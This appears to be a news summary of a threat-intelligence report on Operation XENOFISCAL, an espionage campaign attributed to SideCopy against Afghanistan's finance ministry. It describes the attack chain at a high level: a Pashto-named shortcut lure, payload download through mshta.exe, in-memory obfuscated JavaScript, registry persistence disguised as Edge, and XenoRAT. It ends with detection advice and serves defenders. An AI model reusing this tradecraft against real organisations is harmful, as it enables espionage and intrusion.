A Pakistan-linked cyber espionage group known as SideCopy has been linked to a targeted cyberattack against Afghanistan’s Ministry of Finance. Security researchers identified the operation and named it Operation XENOFISCAL. The campaign was specifically aimed at finance-related government offices across Afghanistan. Investigators believe the attackers were conducting a focused intelligence-gathering operation rather than a large-scale malware campaign.
The attack reportedly began with a spear-phishing email containing a ZIP archive. Inside the archive was a file disguised as an official PDF document. In reality, the file was a malicious Windows shortcut designed to start the infection process. The file name was written in Pashto, making it appear legitimate to government employees.
The fake document claimed to contain information about officials selected for a seminar related to intellectual and psychological warfare. Researchers believe this theme was carefully chosen to attract the attention of government workers. The use of the local language and government-related content increased the chances of victims opening the file. This showed that the attackers had researched their targets before launching the operation.
Once the malicious file was opened, it silently activated a multi-stage infection chain. The attackers used mshta.exe, a legitimate Windows utility, to download additional malicious files. These files were reportedly hosted on a compromised Afghan education website. By abusing trusted Windows tools, the attackers attempted to avoid detection by traditional security software.
The downloaded payload then executed heavily obfuscated JavaScript code directly in memory. The malware also created persistence mechanisms inside the Windows Registry to survive system restarts. Some registry entries were disguised as Microsoft Edge components to appear legitimate. These techniques helped the malware remain hidden for longer periods of time.
The final stage of the attack involved the deployment of XenoRAT version 1.8.7. This Remote Access Trojan allowed the attackers to remotely control infected systems. Once installed, the malware established encrypted communication with command-and-control servers. Researchers noted that the infrastructure was designed to remain operational even if some parts of the operation were discovered.
Investigators also found that the attackers dropped a document containing what appeared to be an Afghan Ministry of Finance staff directory. The file reportedly included information related to finance officials and revenue offices from all 34 provinces. Researchers believe this indicates extensive reconnaissance before the attack took place. Such information could have helped the attackers make their phishing campaign more convincing.
Security experts recommend monitoring suspicious executions of mshta.exe, unexpected registry modifications, unusual scheduled tasks, and unauthorized external network connections. The incident highlights how modern threat actors are increasingly combining social engineering with legitimate system tools. It also demonstrates the growing use of fileless and stealth-focused techniques in cyber espionage campaigns targeting government organizations.
